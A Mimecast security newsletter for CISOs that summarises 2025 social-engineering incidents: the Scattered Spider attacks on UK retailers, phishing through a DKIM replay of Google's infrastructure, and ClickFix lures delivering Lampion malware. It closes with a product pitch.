Human Risk Roundup

In the inaugural edition of the Human Risk Roundup, we delve into recent, real-world examples of how cybercriminals exploit human vulnerabilities to breach organizational defenses. Designed for CISOs and security leaders, this regular feature from Mimecast provides actionable insights into the evolving tactics and psychological strategies used by attackers, helping you stay ahead in safeguarding your organization’s most critical asset—its people.

This week’s issue highlights the Scattered Spider attacks on UK retailers, phishing campaigns exploiting Google’s infrastructure through DKIM replay attacks, and the resurgence of Lampion malware using ClickFix lures, and more. Each story provides actionable insights for security leaders looking to enhance human risk management strategies.

Scattered Spider Attacks on UK Retailers: A Lesson in Human Exploitation

In late April 2025, a series of coordinated cyberattacks struck three major UK retailers—Marks & Spencer (M&S), Co-op Group, and Harrods. Though the attribution remains unofficial, cybersecurity researchers strongly suspect the involvement of the notorious hacking group 'Scattered Spider.' This group is infamous for exploiting human vulnerabilities rather than leveraging advanced technical exploits.

What happened: According to BBC reports, the attack on M&S started around the Easter weekend, initially disrupting Click & Collect services and contactless payments. The ransomware incident halted payment systems, paused online orders, and significantly impacted supply chains. Some suppliers, including Greencore and Nails Inc., resorted to manual processes to meet delivery demands due to operational challenges. M&S lost approximately £3.8 million per day in online sales, and the attack wiped an estimated £500–700 million off its market value. Investigations suggest attackers gained access via stolen credentials obtained through techniques like phishing or multi-factor authentication (MFA) bombing. While some systems have resumed, the broader fallout continues to affect operations.

The Co-op Group also faced a devastating cyberattack this month, relying on sophisticated social engineering techniques. Attackers manipulated IT personnel through impersonation and convinced them to reset passwords, gaining unauthorized access to critical systems. The breach led to logistics disruptions, causing fresh food shortages in many Co-op stores, particularly in Scotland's islands. To mitigate the threat, Co-op implemented measures such as limiting internet access and enhancing verification protocols for virtual meetings. The National Cyber Security Centre (NCSC) has since advised retailers to fortify password reset processes to curb similar risks.

Harrods, on the other hand, successfully countered a cyberattack attempt by taking swift precautionary measures. The company restricted internet access across its operations following unauthorized access attempts linked to social engineering tactics. The luxury retailer's proactive approach prevented further intrusion, though details of the breach remain undisclosed.

Why It Matters: These incidents underline the growing threat of human-focused cyberattacks in retail. M&S serves as a prime example of how compromised credentials and human vulnerabilities can lead to financial and operational turmoil. Co-op illustrates the severe consequences of social engineering within trusted internal processes, while Harrods highlights the importance of rapid detection and action to mitigate threats. Investing in targeted training, strengthening protocols, and equipping employees with the tools to recognize social engineering attempts will be vital in reducing human risk and bolstering organizational resilience.

Read more about these attacks in our Mimecast blog.

Phishing via Google Infrastructure: A Sophisticated Attack on Human Trust

In a new wave of phishing campaigns, attackers have found a way to exploit Google’s trusted infrastructure to send emails that appear authentic. According to The Hacker News, these emails, seemingly from 'no-reply@google.com,' informed recipients of a supposed subpoena from a law enforcement authority. The emails directed users to a Google Sites page that mimicked legitimate Google Support, urging them to upload documents or view case details.

What Happened: Attackers leveraged a DKIM replay attack, allowing them to create an email with a valid signature that bypasses security filters. This technique involves creating a legitimate Google OAuth application, generating a security alert, and forwarding it while preserving the DKIM signature. As a result, the phishing emails appeared to come from legitimate Google accounts, deceiving even advanced security systems.

Why It Matters: Exploiting trusted platforms to deliver malicious content is an emerging challenge for IT security teams. As attackers increasingly use legitimate cloud services for phishing, traditional detection methods become less effective. Organizations should focus on user education about identifying phishing attempts, even when emails appear trustworthy.

Read more about it in The Hacker News.

Lampion Malware Returns with ClickFix Social Engineering Lures

The Lampion malware, notorious for targeting banking information, has resurfaced with a new attack vector called ClickFix. As reported by Palo Alto Networks, this technique manipulates users into executing malicious commands by convincing them that the action will resolve a system issue.

What Happened: The campaign targets Portuguese organizations, particularly in the finance, government, and transportation sectors. Attackers send phishing emails containing a malicious ZIP file, which, when opened, directs users to a fake tax authority site. Victims are instructed to run a PowerShell command, resulting in data theft and system compromise. The malware also uses multiple obfuscation techniques to hide its true function, making detection particularly challenging.

Why It Matters: ClickFix represents a growing trend where attackers manipulate users directly rather than exploiting system vulnerabilities. Security leaders should enhance awareness of this technique and implement monitoring tools that detect suspicious command-line executions.

Read more here. 

Combat Human Risk with Mimecast

Take control of human risk with Mimecast. Our advanced solutions block over 90% of email-based threats, target vulnerabilities effectively, and empower your employees with the tools and training they need to stay secure. Explore how Mimecast can help safeguard your organization against cyber threats and mitigate human risk today.